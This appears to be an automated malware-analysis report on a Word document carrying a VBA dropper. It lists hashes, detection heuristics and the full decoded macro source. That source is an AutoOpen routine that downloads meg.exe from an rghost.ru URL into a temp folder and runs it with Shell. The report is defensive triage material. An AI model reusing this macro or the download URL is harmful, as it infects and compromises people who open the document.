Office (OLE) malware analysis — malicious · b993f242164e6ca4

MALICIOUS

Office (OLE)

48.5 KB Created: 2015-07-24 20:58:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: 1c623922f273a1df2b6fd9c0a3532a4b SHA-1: c692fa13a6b1a05e7d372cbf62a51fbae3eeaa8f SHA-256: b993f242164e6ca498f86c93124786bcf768e003878a416fcb83365578f06cba

440 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen subroutine that is designed to execute upon opening the document. This macro utilizes the URLDownloadToFile API to download a second-stage executable from the URL "http://tau.rghost.ru/download/8ZJkz7dzG/4953e3e51c70892a9c79ab639c0933713ece3afb/meg.exe" and saves it as a .exe file in a temporary directory. Subsequently, the Shell() function is called to execute the downloaded file, indicating a dropper or downloader functionality.

Heuristics 13

ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 7 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

        C.Ez1Ams9QcToXumP95P28kK8737IRCoQxRx9T71I7fP7YAotEYImRLgSQMZDjonGtrnF3ftEhFCeR3jv1fu3tzE0rTJVDyd A, U, D
        B = Shell(D, Z)
y:

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

    Dim t5A1S674WBx8txqVRmSFU4u4Z7mnVt5h4CK1hvWiSBMlITPS8Qd6ZpuKB4N2QMGG22gT2M9pbuork8CHNcVprCSiCTBz9XFWokaEbVIoSfopjgNpPq As String
    Private Declare PtrSafe Function FxH9YzAAXsDGYHWFRf6gWzdG5EQECW7oopCBLxqwyi9R68SPh3d9pue4lpxgrjeZv9UVUoDkv02TBsbR5JGVggDjZ4CKCzJsZLz8s7e1PAi Lib "urlmon.dll" Alias "URLDownloadToFileA" _
    (ByVal lwcqLaQAZSeiLYPCjjCble334A8QdHhD0rv198f7RDvuShIfpVRYaTpLn2leLH6rxKG0pux1CME3R As Long, _

Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL

VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
Matched line in script
```
        C.Ez1Ams9QcToXumP95P28kK8737IRCoQxRx9T71I7fP7YAotEYImRLgSQMZDjonGtrnF3ftEhFCeR3jv1fu3tzE0rTJVDyd A, U, D
        B = Shell(D, Z)
y:
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

        Dim Q As Object
        Set Q = CreateObject("Scripting.FileSystemObject")
        R = Q.FolderExists(sFullPath)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
    Sub AutoOpen()
    On Error GoTo y
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

            N = StrReverse(O(i))
            If R(Environ(N)) Then
                L = Environ(N) & "\"

Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlReferenced by macro
- http://tau.rghost.ru/download/8ZJkz7dzG/4953e3e51c70892a9c79ab639c0933713ece3afb/meg.exeReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4984 bytes
SHA-256: `f8ea97ce934f55e11b9555b1643ae1168adde288dd59f469d37b1253b4f2984d`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 3 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim C As New ESPASPPHLSO Dim B, A, Z As Long Dim U, D, W, O, L, P, N, G As String Private Function T(cb As Integer) As String Randomize W = "abcdefghijklmnopqrstuvwxyz" W = W & UCase(W) Dim i As Long For i = 1 To cb T = T & Mid$(W, Int(Rnd() * Len(W) + 1), 1) Next End Function Private Function R(sFullPath As String) As Boolean Dim Q As Object Set Q = CreateObject("Scripting.FileSystemObject") R = Q.FolderExists(sFullPath) End Function Sub S() O = Array("ataDppA", "PMET") For i = 0 To UBound(O) N = StrReverse(O(i)) If R(Environ(N)) Then L = Environ(N) & "\" Exit For End If Next P = T(8) End Sub Sub AutoOpen() On Error GoTo y Call S A = 0 Z = vbNormalFocus U = "http://tau.rghost.ru/download/8ZJkz7dzG/4953e3e51c70892a9c79ab639c0933713ece3afb/meg.exe" D = L & P & ".exe" C.Ez1Ams9QcToXumP95P28kK8737IRCoQxRx9T71I7fP7YAotEYImRLgSQMZDjonGtrnF3ftEhFCeR3jv1fu3tzE0rTJVDyd A, U, D B = Shell(D, Z) y: End End Sub Attribute VB_Name = "ESPASPPHLSO" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Dim DkTIOoUzevYkmKiObHBo9u7UfGyGWn7zcbxVta2AKXkTuBEGFKGjLrGBIjlW0rT7Cp3w0k2Y9MzPvRRU2aDAeN7G3k, zXSy3V0ruqQUKqYG8ntXwhXtfAvq9gIyzMG5l6ZHQIKFTzxFP8tVwo7ahOACYltY As String Dim tRu19lQzS1hpAuwTLQLSoFKHU3GbiBhH2pL454RFUGMiuOflhAuCfActTTCL87rPulVvTbK8PH9zgwR9FH4JZSwDJ6qIQ0ukNEXizFwYC6pdUAllUcxdCxJasH63r As String Dim pc0lRt7v9chSxeq2HU34T46AN53FFLTTds4oD1yKFNO2xDPRWQ3j6jt0Kmx06QeUS50PiXRl3Leypo632 As String Dim kuc9d6nvY1ptWIohXaUCmP3J1Gpjfb6BUjHjlxjFoOwmpDpEdWBebdaj7qIDp2jpS1AmQRCHcvZ8fqOTRAFImtFMC2nQWLU6cCQhJ3iBn3Q As String Dim t5A1S674WBx8txqVRmSFU4u4Z7mnVt5h4CK1hvWiSBMlITPS8Qd6ZpuKB4N2QMGG22gT2M9pbuork8CHNcVprCSiCTBz9XFWokaEbVIoSfopjgNpPq As String Private Declare PtrSafe Function FxH9YzAAXsDGYHWFRf6gWzdG5EQECW7oopCBLxqwyi9R68SPh3d9pue4lpxgrjeZv9UVUoDkv02TBsbR5JGVggDjZ4CKCzJsZLz8s7e1PAi Lib "urlmon.dll" Alias "URLDownloadToFileA" _ (ByVal lwcqLaQAZSeiLYPCjjCble334A8QdHhD0rv198f7RDvuShIfpVRYaTpLn2leLH6rxKG0pux1CME3R As Long, _ ByVal DkTIOoUzevYkmKiObHBo9u7UfGyGWn7zcbxVta2AKXkTuBEGFKGjLrGBIjlW0rT7Cp3w0k2Y9MzPvRRU2aDAeN7G3k As String, _ ByVal tRu19lQzS1hpAuwTLQLSoFKHU3GbiBhH2pL454RFUGMiuOflhAuCfActTTCL87rPulVvTbK8PH9zgwR9FH4JZSwDJ6qIQ0ukNEXizFwYC6pdUAllUcxdCxJasH63r As String, _ ByVal lwcqLaQAZSeiLYPCjjCble334A8QdHhD0rv198f7RDvuShIfpVRYaTpLn2leLH6rxKG0pux1CME3R As Long, _ ByVal lwcqLaQAZSeiLYPCjjCble334A8QdHhD0rv198f7RDvuShIfpVRYaTpLn2leLH6rxKG0pux1CME3R As Long) As Long Dim A6VGtKVeEQXYTgZuWjtU0QpNNeffxhWRXmZJfimsaru7TEnjbfu9d5MdKvIAYmhSCZWaUdF3yqU, LqEwhzmMjH10za4ihOugaZLYrwQ2OLcywzN5gf7LhG8ahciotEz1Ams9QcToXumP95P28kK8737IRCoQxRx9T71I7fP7YAotEYImRLgSQM As String Dim sNLBsTv7A6PJzLaxDJv7uljBmryyYoH4w0IKKD5FR9KsARcb8CpreMOl5bqsqaFUsAyfVLwB1zyztk7dvTa9QBcsGiaKKkw7hxg8YhQ As String Dim H3ne2fbUCLxPdjNsX9MMqXRfHXSQoT92BXxMTSozoSylFGmAPuEgs1MQFwAj2Gp6EJ6d7oZ6xSWKuUiA4HTDSZ3k0XFD2m235o1wJMYw4LI0G1CtHNvSFOIGIg7R As String Dim U2STVjHI3jOYvRag0ieGLuZQvKUOsWWbkpz4kZK4b2Yf8nbdRmR3BQZn5a0hw9TkCa8DB2GNc80TDg5xBOnOkAQixWY7 As String Public Sub Ez1Ams9QcToXumP95P28kK8737IRCoQxRx9T71I7fP7YAotEYImRLgSQMZDjonGtrnF3ftEhFCeR3jv1fu3tzE0rTJVDyd(v7AH7X4s3uZPUsGjL3YPd0eTmxisNmvYCIHrphejgjWxNvbC45MwHM5GLNW6SQHe7bc35uL2RZh83q3OKZX4ypjlxUXCkdgnZw3y7yG, pc0lRt7v9chSxeq2HU34T46AN53FFLTTds4oD1yKFNO2xDPRWQ3j6jt0Kmx06QeUS50PiXRl3Leypo632, sNLBsTv7A6PJzLaxDJv7uljBmryyYoH4w0IKKD5FR9KsARcb8CpreMOl5bqsqaFUsAyfVLwB1zyztk7dvTa9QBcsGiaKKkw7hxg8YhQ) FxH9YzAAXsDGYHWFRf6gWzdG5EQECW7oopCBLxqwyi9R68SPh3d9pue4lpxgrjeZv9UVUoDkv02TBsbR5JGVggDjZ4CKCzJsZLz8s7e1PAi v7AH7X4s3uZPUsGjL3YPd0eTmxisNmvYCIHrphejgjWxNvbC45MwHM5GLNW6SQHe7bc35uL2RZh83q3OKZX4ypjlxUXCkdgnZw3y7yG, pc0lRt7v9chSxeq2HU34T46AN53FFLTTds4oD1yKFNO2xDPRWQ3j6jt0Kmx06QeUS50PiXRl3Leypo632, sNLBsTv7A6PJzLaxDJv7uljBmryyYoH4w0IKKD5FR9KsARcb8CpreMOl5bqsqaFUsAyfVLwB1zyztk7dvTa9QBcsGiaKKkw7hxg8YhQ, v7AH7X4s3uZPUsGjL3YPd0eTmxisNmvYCIHrphejgjWxNvbC45MwHM5GLNW6SQHe7bc35uL2RZh83q3OKZX4ypjlxUXCkdgnZw3y7yG, v7AH7X4s3uZPUsGjL3YPd0eTmxisNmvYCIHrphejgjWxNvbC45MwHM5GLNW6SQHe7bc35uL2RZh83q3OKZX4ypjlxUXCkdgnZw3y7yG End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.